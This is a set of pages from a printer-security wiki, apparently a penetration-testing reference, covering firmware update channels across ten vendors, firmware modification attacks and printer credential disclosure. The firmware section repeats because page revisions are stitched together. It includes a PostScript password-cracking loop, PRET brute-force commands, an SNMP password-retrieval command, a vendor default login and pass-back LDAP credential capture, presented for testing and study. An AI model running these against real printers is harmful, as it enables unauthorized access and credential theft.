Firmware can be downloaded from [http://epson.com epson.com] and via FTP from [ftp://download.epson-europe.com/ download.epson-europe.com]. Files come as WinZip self-extracting <code>.exe</code> files and can be unpacked using ''unp''<ref>''[http://unp.bencastricum.nl/ UNP executable file restore utility]'', A. Karwath</ref>. The contained <code>.efu</code> files can be analyzed using ''Binwalk''<ref>''[http://binwalk.org/ Binwalk firmware analysis tool]'', C. Heffner</ref> which extracts the actual firmware. One can obtain 49 <code>.rcx</code> files of unknown format (‘SEIKO EPSON EpsonNet Form’) and nine <code>.prn</code> files containing PJL commands (<code>@PJL ENTER LANGUAGE=DOWNLOAD</code>). Epson has not released any publicly available information on protection mechanisms.

=== Dell ===

Firmware can be obtained from [http://downloads.dell.com downloads.dell.com] and from [ftp://ftp.us.dell.com/printer ftp.us.dell.com/printer]. Files can be unpacked using ''unp'' and the included <code>.zip</code> files can be extracted with a variant of ''unzip''. Dell does not produce any printing devices, but rebadges the products of other vendors. Therefore a wide variety of firmware files, including 18 <code>.hd</code> files containing <code>@PJL FIRMWARE=…</code>, 25 <code>.prn</code> files containing <code>@PJL ENTER LANGUAGE=DOWNLOAD</code> and 30 <code>.fls</code>/<code>.fly</code> files containing <code>@PJL LPROGRAMRIP</code> were found. Regarding protection mechanisms, Dell has not released any publicly available information.

=== Brother ===

Firmware cannot be easily downloaded. Instead a Windows binary needs to be run which checks for available printers and requests download links for the latest firmware from a web service. By guessing correct parameters, one is able to get the links for 98 files. Firmware files do not need to be unpacked as they already come in raw format. 79 files have the extension <code>.djf</code> and contain <code>@PJL EXECUTE BRDOWNLOAD</code> while nine <code>.blf</code> files contain <code>@PJL ENTER LANGUAGE=PCL</code>. Brother has not released any publicly available information on protection mechanisms.

=== Lexmark ===

Firmware is available from [http://support.lexmark.com support.lexmark.com] and can be unpacked using ''unp''. 63 <code>fls</code> files could be obtained containing the PJL header <code>@PJL LPROGRAMRIP</code> to install the firmware. Lexmark's security whitepaper claims ‘packages must be encrypted with a symmetric encryption algorithm through a key that is known only to Lexmark and is embedded securely in all devices. However, the strongest security measure comes from requiring that all firmware packages must include multiple digital 2048-bit RSA signatures from Lexmark. If these signatures are not valid [...] the firmware is discarded’ <ref>''[http://media.lexmark.com/www/doc/en_US/Security_White_Paper_Final_Q12014.pdf Security Features of Lexmark Multi-Function and Single Function Printers]'', Lexmark International, 2013, p. 6</ref>.

=== Samsung ===

Firmware can be downloaded from [http://www.samsung.com/us/support/download www.samsung.com/us/support/download]. Retrieved files either come as zip archives or Windows executables which can be run in wine and further unpacked using ''unp''. This way, 33 <code>.hd</code> files starting with <code>@PJL FIRMWARE</code> and associated <code>.prn</code> files containing <code>@PJL DEFAULT SWUPGRADE=ON</code> could be obtained. Samsung has not released any publicly available information on protection mechanisms.

=== Xerox ===

Firmware is publicly available at [http://www.support.xerox.com www.support.xerox.com]. Downloaded files come in zip format and can be unpacked using ''unzip''. Firmware files are in different formats: 16 <code>.hd</code> files including <code>@PJL FIRMWARE=…</code>, 36 PostScript files for older devices and 35 <code>.dlm</code> files which is the format used by currently used by Xerox and includes digital signatures. A flaw in the deployment process however was found by <ref name="heiland2011patched"/> and extended by <ref name="weidenbach2016pwn"/>, leading to remote code execution – the private key and the tool used for code signing was contained in the firmware itself.

=== Ricoh ===

The ‘Firmware Download Center’ at [https://support.ricoh.com support.ricoh.com] is not open to the general public. Fortunately the interweb contains direct links to a couple of driver/firmware download pages so one is able to obtain 31 firmware files using a simple Google search (<code>site:support.ricoh.com firmware</code>). Files can be unpacked using ''unp''. 14 <code>.bin</code> files contain <code>@PJL RSYSTEMUPDATE SIZE=…</code> while 15 <code>.brn</code> files are associated with a <code>settings.ini</code>, including <code>@PJL FWDOWNLOAD</code> and <code>USERID=sysadm, PASSWORD=sysadm</code>. Ricoh does not provide any up-to-date information on protection mechanisms. In a whitepaper dating back to 2007, Ricoh claims that ‘only service technicians have a password and dedicated account for making firmware updates’ <ref>''[http://www.tsrc.ricoh-usa.com/pwhp/Network_Security_v1.7.pdf Network Security White Paper for Digital Multifunction and Printing Devices]'', Ricoh Corp., 2007, p. 10</ref>.

=== Kyocera ===

Kyocera does not release firmware to end-users. In a publicly available Kyocera dealer forum however, firmware downloads for various models are linked: [ftp://ftp.kdaconnect.com ftp.kdaconnect.com]. Files can be unpacked using ''unp'' and contain mountable ''cramfs''<ref>''[http://sourceforge.net/projects/cramfs/ cramfs – A Linux filesystem designed to be simple, small, and to compress things well]'', D. Quinlan</ref> and ''squashfs''<ref>''[http://squashfs.sourceforge.net/ squashfs – A compressed read-only filesystem for Linux]'', P. Lougher and R. Lougher</ref> images as well as proprietary binary formats. Firmware is deployed as a print job with <code>!R! UPGR'SYS';EXIT;</code> prepended – the ''upgrade'' command of the ''PRESCRIBE'' page description language <ref>''[http://kyoceradocumentsolutions.co.th/news/products/img_document/fs19k_rev11.pdf Kyocera Laser Printer FS-1900 Service Manual]'', Kyocera Corp., 2001, ch. 3-19</ref>. Kyocera has not released any publicly available information on protection mechanisms.

=== Konica ===

Although not actively promoted, firmware for Konica Minolta printers can be downloaded from [http://download6.konicaminolta.eu download6.konicaminolta.eu]. Newer Internet-connected devices have the capability to perform firmware updates themselves. Compressed files come in different formats and can be unpacked using ''unp'', ''unzip'' and ''tar'' which results in 38 proprietary <code>.bin</code> files, 20 PostScript based ‘softload printer modules’ for older devices and 14 files of different extensions containing PJL commands like <code>@PJL ENTER LANGUAGE=FIRMUPDATE</code>. The Konica Minolta security whitepaper claims that firmware is verified using a ‘hash value’ <ref>''[http://www.biz.konicaminolta.com/product_security_policy/pdf/security_white_paper_version8_0_7.pdf Konica Minolta Security White Paper]'', Konica Minolta, Inc., 2015, p. 26</ref>. It may be doubted that such a scheme is cryptographically secure.

== Results ==

Out of ten analyzed manufacturers, nine use [[PJL]] commands for all or at least some of their firmware update procedures which is a strong indicator that updates are deployed as ordinary print jobs. The remaining manufacturer – Kyocera – applies the ''PRESCRIBE'' page description language. One can therefore claim that it is common in the printing industry to install new firmware over the printing channel itself and name a '''major design flaw''' present in almost any printer device: '''data and code over the same channel'''. Exploitation of this issue however, is hard as for most manufacturers no reasoned statement on protection mechanisms can be made. An in-depth analysis of firmware modification attacks should therefore be part of future research. A summary of file headers or types for all obtained firmware files is given below:

{| class="wikitable"
|-
! Vendor !! Extension !! Quantity !! File header or type
|-
| rowspan="2" | HP
| rfu || 419 || @PJL UPGRADE SIZE=…
|-
| bdl || 206 || FutureSmart binary format
|-
| rowspan="3" | Epson
| rcx || 49 || SEIKO EPSON EpsonNet Form
|-
| prn || 9 || @PJL ENTER LANGUAGE=DOWNLOAD
|-
| brn || 7 || Unknown binary, includes config file
|-
| rowspan="6" | Dell
| fls, fly || 30 || @PJL LPROGRAMRIP
|-
| prn || 25 || @PJL ENTER LANGUAGE=DOWNLOAD
|-
| hd || 18 || @PJL FIRMWARE=…
|-
| brn || 3 || Unknown binary, includes config file
|-
| ps || 2 || PostScript (title: ''Firmware Update'')
|-
| pjl || 1 || @PJL ENTER LANGUAGE=FLASH
|-
| rowspan="2" | Brother
| djf || 79 || @PJL EXECUTE BRDOWNLOAD
|-
| blf || 9 || @PJL ENTER LANGUAGE=PCL
|-
| rowspan="2" | Lexmark
| fls || 63 || @PJL LPROGRAMRIP
|-
| bin, fls || 6 || Unknown binary format
|-
| rowspan="2" | Samsung
| hd || 33 || @PJL FIRMWARE=…
|-
| fls, hd0 || 4 || @PJL DEFAULT P1284VALUE=…
|-
| rowspan="10" | Xerox
| ps || 36 || PostScript (title: ''Firmware Update'')
|-
| dlm || 35 || Xerox Dynamic Loadable Module
|-
| prn, bin || 20 || @PJL ENTER LANGUAGE=DOWNLOAD
|-
| hd || 16 || @PJL FIRMWARE=…
|-
| brn || 10 || Unknown binary, includes config file
|-
| bin || 10 || @PJL SET JOBATTR="@SWDL"
|-
| fls, hd, hde || 8 || @PJL DEFAULT P1284VALUE=…
|-
| fls, xfc || 4 || @PJL ENTER LANGUAGE=XFLASH
|-
| pjl || 3 || @PJL FSDOWNLOAD [name].rpm
|-
| axf || 3 || RISC OS AIF executable
|-
| rowspan="3" | Ricoh
| brn || 15 || @PJL FWDOWNLOAD…
|-
| bin || 14 || @PJL RSYSTEMUPDATE SIZE=…
|-
| fls || 4 || @PJL LPROGRAMRIP
|-
| rowspan="4" | Kyocera
| cramfs, img || 98 || cramfs image
|-
| bin, squashfs || 79 || squashfs image
|-
| bin, kmmfp || 41 || u-boot legacy uImage
|-
| efi, kmpanel || 13 || proprietary image format
|-
| rowspan="4" | Konica Minolta
| bin || 38 || unknown binary, additional checksum file
|-
| ps || 20 || PostScript (title: ''Softload printer modules'')
|-
| ftp, prn || 11 || @PJL ENTER LANGUAGE=FIRMUPDATE
|-
| upg || 1 || @PJL ENTER LANGUAGE=UPGRADE
|-
|}

'''How to test for this attack?'''

The security of code signing is based on keeping the private key a long-term trade secret. There are however potentially still printers in the wild which are vulnerable to malicious firmware – either because they have not yet been updated or because proprietary checksum algorithms are sold as cryptographically secure digital signature schemes. It certainly must be pointed out that analyzing firmware can be hard if vendors do not document their firmware formats and update routines. Usually this requires some reverse engineering. Testing the feasibility of firmware modification attacks therefore is not trivial. In a simple test, one can '''flip a single bit''' and check if the modified firmware is still accepted by the printer device. If not, either a checksum or a digital signature is verfified by the printer. Finding the difference is not always easy and writing malicious firmware (with a correct checksum) can be a time-consuming project.

''Other attack scenarios include:''

* Even if the firmware is signed, one may be able to downgrade to a certain (signed) firmware version, which has known security weaknesses.
* Even if the firmware is signed, it can sometimes be mounted to gain further information (especially Konica Minolta firmware is easly mountable).
* Just because firmware is signed doesn't mean its secure. Using ''binwalk''/''grep'' etc. one may find components with known vulnerabilities like [https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-7547 CVE-2015-7547].

'''Who can perform this attack?'''

Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]].

----

Firmware updates

2017-01-31T08:53:10Z

84.153.135.37: /* Ricoh */

The dangers of malicious firmware updates are well-known and have been discussed early by <ref>''[https://www.cs.cornell.edu/~kozen/papers/acsac.pdf Malicious Code Detection for Open Firmware]'', F. Adelstein, M. Stillerman and D. Kozen, Computer Security Applications Conference, 2002. Proceedings. 18th Annual, IEEE, 2002, p. 403-412</ref> and <ref>''[http://ceur-ws.org/Vol-190/paper11.pdf Phishing with Consumer Electronics: Malicious Home Routers]'', A. Tsow, MTW 190, 2006</ref>. In contrast to other networked devices however, '''it is common for printers to deploy firmware updates as ordinary print jobs'''. This opens up a wide gateway for attackers because access to printing functionality is usually a low hurdle. One can only speculate about the motivation for such insecure design decisions but it seems logical that historic reasons play a role: Printers used to be connected by parallel or USB cable. Without network connectivity, security was less important and without a password-protected web server or similar functionality the printing channel was the only way to send data to the device.

Firmware modification attacks against network printers have been demonstrated by <ref name="cui2011print">''[http://ids.cs.columbia.edu/sites/default/files/CuiPrintMeIfYouDare.pdf Print Me If You Dare: Firmware Modification Attacks and the Rise of Printer Malware]'', A. Cui and J. Stolfo, 2011</ref> for HP devices, by <ref name="jordon2014wrestling">''[https://www.contextis.com/resources/blog/hacking-canon-pixma-printers-doomed-encryption/ Hacking Canon Pixma Printers – Doomed Encryption]'', M. Jordon, 2014</ref> for the Canon PIXMA series and by <ref name="heiland2011patched">''[http://foofus.net/goons/percx/Xerox_hack.pdf From Patched to Pwned: Attacking Xerox's Multifunction Printers Patch Process]'', D. Heiland, 2011</ref> and <ref name="weidenbach2016pwn">''[https://www.fkie.fraunhofer.de/content/dam/fkie/de/documents/xerox_phaser_6700_white_paper.pdf PWN Xerox Printers (… again): About Hardware Attacks and (In) Secure Cloning]'', P. Weidenbach and R. Ernst, Fraunhofer FKIE, 2016</ref> for various Xerox models. As a countermeasure, printer manufacturer started to digitally sign their firmware <ref name="hp2012rfu">''[http://h20564.www2.hp.com/hpsc/doc/public/display?docId=emr_na-c03102449 Security Bulletin HPSBPI02728 SSRT100692 Rev. 6]'', HP Inc., 2012</ref>.

== Vendors ==

To give an overview of firmware deployment procedures 1,400 firmware files for the top 10 printer manufacturers have been downloaded and systematically categorized by <ref>''Exploiting Network Printers'', J. Müller, 2016, p. 56-58</ref>. The results are as follows.

=== HP ===

Firmware can be downloaded from [http://support.hp.com support.hp.com] or directly from [ftp://ftp.hp.com/pub/networking/software/pfirmware/ ftp.hp.com] via FTP. 419 files in HP's traditional remote firmware update (<code>.rfu</code>) format and 206 newer ‘HP FutureSmart’ binaries (<code>.bdl</code>) can be retrieved. The <code>.rfu</code> files contain proprietary PJL commands like <code>@PJL UPGRADE SIZE=…</code>, indicating that firmware updates are deployed as normal print jobs. This has been demonstrated by <ref name="cui2011print"/> and caused HP to digitally sign all their printer firmware since March 2012 <ref name="hp2012rfu"/>.

=== Canon ===

Firmware is available at [http://www.canon.com/support/ www.canon.com/support]. Canon however requires a valid device serial number which to download any firmware. According to <ref name="jordon2014wrestling"/>, who were able to modify firmware for the Canon PIXMA series, ‘there is no signing (the correct way to do it) but it does have very weak encryption’. According to email correspondence with a Canon technical support representative, ‘firmware does have to be digitally signed by Canon in order for it to be accepted by the printer’.

=== Epson ===

Firmware can be downloaded from [http://epson.com epson.com] and via FTP from [ftp://download.epson-europe.com/ download.epson-europe.com]. Files come as WinZip self-extracting <code>.exe</code> files and can be unpacked using ''unp''<ref>''[http://unp.bencastricum.nl/ UNP executable file restore utility]'', A. Karwath</ref>. The contained <code>.efu</code> files can be analyzed using ''Binwalk''<ref>''[http://binwalk.org/ Binwalk firmware analysis tool]'', C. Heffner</ref> which extracts the actual firmware. One can obtain 49 <code>.rcx</code> files of unknown format (‘SEIKO EPSON EpsonNet Form’) and nine <code>.prn</code> files containing PJL commands (<code>@PJL ENTER LANGUAGE=DOWNLOAD</code>). Epson has not released any publicly available information on protection mechanisms.

=== Dell ===

Firmware can be obtained from [http://downloads.dell.com downloads.dell.com] and from [ftp://ftp.us.dell.com/printer ftp.us.dell.com/printer]. Files can be unpacked using ''unp'' and the included <code>.zip</code> files can be extracted with a variant of ''unzip''. Dell does not produce any printing devices, but rebadges the products of other vendors. Therefore a wide variety of firmware files, including 18 <code>.hd</code> files containing <code>@PJL FIRMWARE=…</code>, 25 <code>.prn</code> files containing <code>@PJL ENTER LANGUAGE=DOWNLOAD</code> and 30 <code>.fls</code>/<code>.fly</code> files containing <code>@PJL LPROGRAMRIP</code> were found. Regarding protection mechanisms, Dell has not released any publicly available information.

=== Brother ===

Firmware cannot be easily downloaded. Instead a Windows binary needs to be run which checks for available printers and requests download links for the latest firmware from a web service. By guessing correct parameters, one is able to get the links for 98 files. Firmware files do not need to be unpacked as they already come in raw format. 79 files have the extension <code>.djf</code> and contain <code>@PJL EXECUTE BRDOWNLOAD</code> while nine <code>.blf</code> files contain <code>@PJL ENTER LANGUAGE=PCL</code>. Brother has not released any publicly available information on protection mechanisms.

=== Lexmark ===

Firmware is available from [http://support.lexmark.com support.lexmark.com] and can be unpacked using ''unp''. 63 <code>fls</code> files could be obtained containing the PJL header <code>@PJL LPROGRAMRIP</code> to install the firmware. Lexmark's security whitepaper claims ‘packages must be encrypted with a symmetric encryption algorithm through a key that is known only to Lexmark and is embedded securely in all devices. However, the strongest security measure comes from requiring that all firmware packages must include multiple digital 2048-bit RSA signatures from Lexmark. If these signatures are not valid [...] the firmware is discarded’ <ref>''[http://media.lexmark.com/www/doc/en_US/Security_White_Paper_Final_Q12014.pdf Security Features of Lexmark Multi-Function and Single Function Printers]'', Lexmark International, 2013, p. 6</ref>.

=== Samsung ===

Firmware can be downloaded from [http://www.samsung.com/us/support/download www.samsung.com/us/support/download]. Retrieved files either come as zip archives or Windows executables which can be run in wine and further unpacked using ''unp''. This way, 33 <code>.hd</code> files starting with <code>@PJL FIRMWARE</code> and associated <code>.prn</code> files containing <code>@PJL DEFAULT SWUPGRADE=ON</code> could be obtained. Samsung has not released any publicly available information on protection mechanisms.

=== Xerox ===

Firmware is publicly available at [http://www.support.xerox.com www.support.xerox.com]. Downloaded files come in zip format and can be unpacked using ''unzip''. Firmware files are in different formats: 16 <code>.hd</code> files including <code>@PJL FIRMWARE=…</code>, 36 PostScript files for older devices and 35 <code>.dlm</code> files which is the format used by currently used by Xerox and includes digital signatures. A flaw in the deployment process however was found by <ref name="heiland2011patched"/> and extended by <ref name="weidenbach2016pwn"/>, leading to remote code execution – the private key and the tool used for code signing was contained in the firmware itself.

=== Ricoh ===

The ‘Firmware Download Center’ at [https://support.ricoh.com support.ricoh.com] is not open to the general public. Fortunately the interweb contains direct links to a couple of driver/firmware download pages so one is able to obtain 31 firmware files using a simple Google search (<code>site:support.ricoh.com firmware</code>). Files can be unpacked using ''unp''. 14 <code>.bin</code> files contain <code>@PJL RSYSTEMUPDATE SIZE=…</code> while 15 <code>.brn</code> files are associated with a <code>settings.ini</code>, including <code>@PJL FWDOWNLOAD</code> and <code>USERID=sysadm, PASSWORD=sysadm</code>. Ricoh does not provide any up-to-date information on protection mechanisms. In a whitepaper dating back to 2007, Ricoh claims that ‘only service technicians have a password and dedicated account for making firmware updates’ <ref>''[http://www.tsrc.ricoh-usa.com/pwhp/Network_Security_v1.7.pdf Network Security White Paper for Digital Multifunction and Printing Devices]'', Ricoh Corp., 2007, p. 10</ref>.

=== Kyocera ===

Kyocera does not release firmware to end-users. In a publicly available Kyocera dealer forum however, firmware downloads for various models are linked: [ftp://ftp.kdaconnect.com ftp.kdaconnect.com]. Files can be unpacked using ''unp'' and contain mountable ''cramfs''<ref>''[http://sourceforge.net/projects/cramfs/ cramfs – A Linux filesystem designed to be simple, small, and to compress things well]'', D. Quinlan</ref> and ''squashfs''<ref>''[http://squashfs.sourceforge.net/ squashfs – A compressed read-only filesystem for Linux]'', P. Lougher and R. Lougher</ref> images as well as proprietary binary formats. Firmware is deployed as a print job with <code>!R! UPGR'SYS';EXIT;</code> prepended – the ''upgrade'' command of the ''PRESCRIBE'' page description language <ref>''[http://kyoceradocumentsolutions.co.th/news/products/img_document/fs19k_rev11.pdf Kyocera Laser Printer FS-1900 Service Manual]'', Kyocera Corp., 2001, ch. 3-19</ref>. Kyocera has not released any publicly available information on protection mechanisms.

=== Konica ===

Although not actively promoted, firmware for Konica Minolta printers can be downloaded from [http://download6.konicaminolta.eu download6.konicaminolta.eu]. Newer Internet-connected devices have the capability to perform firmware updates themselves. Compressed files come in different formats and can be unpacked using ''unp'', ''unzip'' and ''tar'' which results in 38 proprietary <code>.bin</code> files, 20 PostScript based ‘softload printer modules’ for older devices and 14 files of different extensions containing PJL commands like <code>@PJL ENTER LANGUAGE=FIRMUPDATE</code>. The Konica Minolta security whitepaper claims that firmware is verified using a ‘hash value’ <ref>''[http://www.biz.konicaminolta.com/product_security_policy/pdf/security_white_paper_version8_0_7.pdf Konica Minolta Security White Paper]'', Konica Minolta, Inc., 2015, p. 26</ref>. It may be doubted that such a scheme is cryptographically secure.

== Results ==

Out of ten analyzed manufacturers, nine use [[PJL]] commands for all or at least some of their firmware update procedures which is a strong indicator that updates are deployed as ordinary print jobs. The remaining manufacturer – Kyocera – applies the ''PRESCRIBE'' page description language. One can therefore claim that it is common in the printing industry to install new firmware over the printing channel itself and name a '''major design flaw''' present in almost any printer device: '''data and code over the same channel'''. Exploitation of this issue however, is hard as for most manufacturers no reasoned statement on protection mechanisms can be made. An in-depth analysis of firmware modification attacks should therefore be part of future research. A summary of file headers or types for all obtained firmware files is given below:

{| class="wikitable"
|-
! Vendor !! Extension !! Quantity !! File header or type
|-
| rowspan="2" | HP
| rfu || 419 || @PJL UPGRADE SIZE=…
|-
| bdl || 206 || FutureSmart binary format
|-
| rowspan="3" | Epson
| rcx || 49 || SEIKO EPSON EpsonNet Form
|-
| prn || 9 || @PJL ENTER LANGUAGE=DOWNLOAD
|-
| brn || 7 || Unknown binary, includes config file
|-
| rowspan="6" | Dell
| fls, fly || 30 || @PJL LPROGRAMRIP
|-
| prn || 25 || @PJL ENTER LANGUAGE=DOWNLOAD
|-
| hd || 18 || @PJL FIRMWARE=…
|-
| brn || 3 || Unknown binary, includes config file
|-
| ps || 2 || PostScript (title: ''Firmware Update'')
|-
| pjl || 1 || @PJL ENTER LANGUAGE=FLASH
|-
| rowspan="2" | Brother
| djf || 79 || @PJL EXECUTE BRDOWNLOAD
|-
| blf || 9 || @PJL ENTER LANGUAGE=PCL
|-
| rowspan="2" | Lexmark
| fls || 63 || @PJL LPROGRAMRIP
|-
| bin, fls || 6 || Unknown binary format
|-
| rowspan="2" | Samsung
| hd || 33 || @PJL FIRMWARE=…
|-
| fls, hd0 || 4 || @PJL DEFAULT P1284VALUE=…
|-
| rowspan="10" | Xerox
| ps || 36 || PostScript (title: ''Firmware Update'')
|-
| dlm || 35 || Xerox Dynamic Loadable Module
|-
| prn, bin || 20 || @PJL ENTER LANGUAGE=DOWNLOAD
|-
| hd || 16 || @PJL FIRMWARE=…
|-
| brn || 10 || Unknown binary, includes config file
|-
| bin || 10 || @PJL SET JOBATTR="@SWDL"
|-
| fls, hd, hde || 8 || @PJL DEFAULT P1284VALUE=…
|-
| fls, xfc || 4 || @PJL ENTER LANGUAGE=XFLASH
|-
| pjl || 3 || @PJL FSDOWNLOAD [name].rpm
|-
| axf || 3 || RISC OS AIF executable
|-
| rowspan="3" | Ricoh
| brn || 15 || @PJL FWDOWNLOAD…
|-
| bin || 14 || @PJL RSYSTEMUPDATE SIZE=…
|-
| fls || 4 || @PJL LPROGRAMRIP
|-
| rowspan="4" | Kyocera
| cramfs, img || 98 || cramfs image
|-
| bin, squashfs || 79 || squashfs image
|-
| bin, kmmfp || 41 || u-boot legacy uImage
|-
| efi, kmpanel || 13 || proprietary image format
|-
| rowspan="4" | Konica Minolta
| bin || 38 || unknown binary, additional checksum file
|-
| ps || 20 || PostScript (title: ''Softload printer modules'')
|-
| ftp, prn || 11 || @PJL ENTER LANGUAGE=FIRMUPDATE
|-
| upg || 1 || @PJL ENTER LANGUAGE=UPGRADE
|-
|}

'''How to test for this attack?'''

The security of code signing is based on keeping the private key a long-term trade secret. There are however potentially still printers in the wild which are vulnerable to malicious firmware – either because they have not yet been updated or because proprietary checksum algorithms are sold as cryptographically secure digital signature schemes. It certainly must be pointed out that analyzing firmware can be hard if vendors do not document their firmware formats and update routines. Usually this requires some reverse engineering. Testing the feasibility of firmware modification attacks therefore is not trivial. In a simple test, one can '''flip a single bit''' and check if the modified firmware is still accepted by the printer device. If not, either a checksum or a digital signature is verfified by the printer. Finding the difference is not always easy and writing malicious firmware (with a correct checksum) can be a time-consuming project.

''Other attack scenarios include:''

* Even if the firmware is signed, one may be able to downgrade to a certain (signed) firmware version, which has known security weaknesses.
* Even if the firmware is signed, it can sometimes be mounted to gain further information (especially Konica Minolta firmware is easly mountable).
* Just because firmware is signed doesn't mean its secure. Using ''binwalk''/''grep'' etc. one may find components with known vulnerabilities like [https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-7547 CVE-2015-7547].

'''Who can perform this attack?'''

Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]].

----

Credential disclosure

2017-01-31T08:51:42Z

84.153.135.37:

Printers are commonly deployed with a default password or no initial password at all. In both cases, end-users or administrators have to actively set a password to secure the device. This article discusses generic brute-force attacks against PJL and PostScript passwords as well as model specific password disclosure.

== Brute-Force Attacks ==

Besides credentials leaked from sources like [[File system access|file system]] or [[memory access]], [[#SNMP|SNMP]] and the printer's [[#Pass-Back|embedded web server]], printing languages offer limited passwords protection mechanisms themselves. Breaking such mechanisms has a priority in this wiki because it focuses on printer-specific weaknesses. Furthermore, whilst the routines to set the password for a printer's embedded web server differ from model to model they are standardized for both [[PJL]] and [[PostScript]]. Although it is not very common for end-users or even administrators to set or actually know about these passwords, if enabled they can disable some of the attacks discussed in this wiki. Attackers should therefore have a motivation to crack or bypass them if necessary.

=== PJL ===

PJL offers the possibility to set a password to lock access to the printer's hard disk and/or control panel. PJL disk lock as shown below is the defense mechanism propagated by HP against PJL file system access, including its known path traversal vulnerabilities <ref>''[http://h20564.www2.hp.com/hpsc/doc/public/display?docId=emr_na-c02004333 Security Bulletin HPSBPI02575 SSRT090255 Rev. 1]'', HP Inc., 2010</ref>:

@PJL JOB PASSWORD=0
@PJL DEFAULT PASSWORD=12345
@PJL DEFAULT DISKLOCK=ON
@PJL DEFAULT CPLOCK=ON

PJL passwords however are vulnerable to brute-force attacks because of their limited 16 bit key size as demonstrated by <ref>''Attacking Networked Embedded Devices'', Black Hat USA, FX and FtR of Phenoelit, 2002</ref> who were able to unlock the disk protection within 6 hours in the worst case. With PJL interpreters having gotten faster while the PJL standard was never updated and still limits passwords to numerical values ranging from 1 to 65535 <ref>''[http://h10032.www1.hp.com/ctg/Manual/bpl13208.pdf Printer Job Language Technical Reference Manual]'', HP Inc., 1997, ch. 6-21</ref>, cracking time has efficiently decreased. In a test with 20 devices, between 50 and 1,000 passwords could be evaluated per second leading to average cracking times between 30 seconds and 10 minutes.

While PJL passwords can be set on various devices, actual disk lock and/or control panel lock is only supported by few printers. It is unclear if the password has any undocumented, proprietary effects on these machines or is just a dummy variable. Furthermore, non-compliant with the PJL standard, Brother based devices do not even verify the password to lock or unlock the control panel, rendering it practically useless.

'''How to test this attack?'''

The ''lock'' and ''unlock'' commands of [[PRET]] can be used to test brute-force attacks against PJL passwords:

./pret.py -q printer pjl
Connection to printer established

Welcome to the pret shell. Type help or ? to list commands.
printer:/> lock 999
PIN protection: ENABLED
Panel lock: ON
Disk lock: ON
printer:/> unlock
No PIN given, cracking.
PIN protection: DISABLED
Panel lock: OFF
Disk lock: OFF

'''Who can perform this attack?'''

Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. Feedback from the printer is not required because attackers can blindly remove the password protection by including all 65535 possible combinations in a single print job.

=== PostScript ===

PostScript offers two types of passwords: The ''SystemParamsPassword'' is used to change print job settings like paper size, while the ''StartJobPassword'' is required to exit the server loop and therefore permanently alter the PostScript environment. The ''checkpassword'' operator which takes either an integer or a string as input checks for both passwords at once <ref>''[http://ftp.ktug.org/obsolete/info/adobe/devtechnotes/pdffiles/ps2016.supplement.pdf PostScript Language Reference Manual Supplement for Version 2016]'', Adobe Systems Inc., 1995, p. 194</ref>. The key size is very large: PostScript strings can contain arbitrary ASCII characters and have a maximum length of 65,565 <ref>''[https://www.adobe.com/products/postscript/pdfs/PLRM.pdf PostScript Language Reference Manual, 3rd Edition]'', Adobe Systems Inc., 1999, p. 739</ref> which theoretically allows 524,280 bit passwords. On the positive side (from an attackers point of view) brute-force attacks against PostScript passwords can be performed extremely fast because the PostScript interpreter can be programmed to literally crack itself. A simple PostScript password cracker testing for numerical values as passwords is given below:

<syntaxhighlight lang=postscript>
/min 0 def /max 1000000 def
statusdict begin {
min 1 max
{dup checkpassword {== flush stop} {pop} ifelse} for
} stopped pop
</syntaxhighlight>

Tested printers were capable of performing between 5,000 and 100,000 password verifications per second. Such enormous cracking rates can be achieved because a printer's RIP is highly optimized for fast processing of PostScript code. Brother based devices are exceptions as ''BR-Script'' only accepts one password per second but also checks for the very first character of the password only which effectively limits the key size to 256 characters or 8 bit. As it seems, Kyocera's ''KPDL'' does not support permanent PostScript passwords at all.

'''How to test this attack?'''

The ''lock'' and ''unlock'' commands of [[PRET]] can be used to test brute-force attacks against numeric (integer) PostScript passwords:

./pret.py -q printer ps
Connection to printer established

Welcome to the pret shell. Type help or ? to list commands.
printer:/> lock 999
printer:/> unlock
No password given, cracking.
Found password: 999

'''Who can perform this attack?'''

Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. Feedback from the printer is not required because attackers can blindly remove the password protection by cracking it in a single print job.

== Password Disclosure ==

=== SNMP ===

Ancient HP printers (manufactured 2003 and earlier) had a bug which allowed an attacker to retrieve the password for the embedded web server through SNMP requests. The vulnerable OID to be requested (''.iso.org.dod.internet.private.enterprises.hp.nm.system.net-peripheral.net-printer.generalDeviceStatus.gdPasswords'') was even documented by HP. Other vendors may have similar SNMP based issues. Penetration testers may find flaws by studying the various publicly available MIBs released by printer manufacturers.

'''How to test this attack?'''

To test this attack against ancient HP printers, the ''snmpset'' tool can be used as shown below:

<syntaxhighlight lang=sh>
snmpget -v1 -c public printer iso.3.6.1.4.1.11.2.3.9.1.1.13.0
iso.3.6.1.4.1.11.2.3.9.1.1.13.0 = Hex-STRING: 41 41 41 00 …
</syntaxhighlight>

Vulnerable devices will return the password in hexadecimal (here: ''AAA''), while newer devices do only respond with zerobytes.

'''Who can perform this attack?'''

Anyone who can send network packets to port 161/udp of the printer device.

=== Pass-Back ===

Another interesting class of attacks is pass-back attacks were ‘an MFP device is directed into authenticating [...] against a rogue system rather than the expected server’ <ref>''[http://foofus.net/goons/percx/praeda/pass-back-attack.pdf Anatomy of a Pass-Back-Attack: Intercepting Authentication Credentials Stored in Multifunction Printers]'', D. Heiland and M. Belton, 2011</ref>. This works in setups where a printer/MFP authenticates users via an external [https://en.wikipedia.org/wiki/Lightweight_Directory_Access_Protocol LDAP] server. Note that the credentials to access the LDAP server are stored on the MFP itself. If the MFP allows an attacker to change the address of the LDAP server while keeping the stored credentials, whenever someone (for example, the attacker itself) tries to authenticate with the MFP, the MFP leaks the original LDAP credentials to the attacker-controlled server. This example shows that passwords resident on printers may not only harm the device itself if integrated into a company's network. Printers and MFPs – which may offer insufficient protection – are therefore a good starting point in network penetration tests.

'''How to test this attack?'''

Check if you can change printer settings like the LDAP hostname while keeping the old LDAP password.

'''Who can perform this attack?'''

Usually anyone who can access the printer's embedded web server. This may include [https://en.wikipedia.org/wiki/Cross-site_request_forgery CRSF] attacker, if the web application running on the printer has no CSRF protection.

----

USB drive or cable

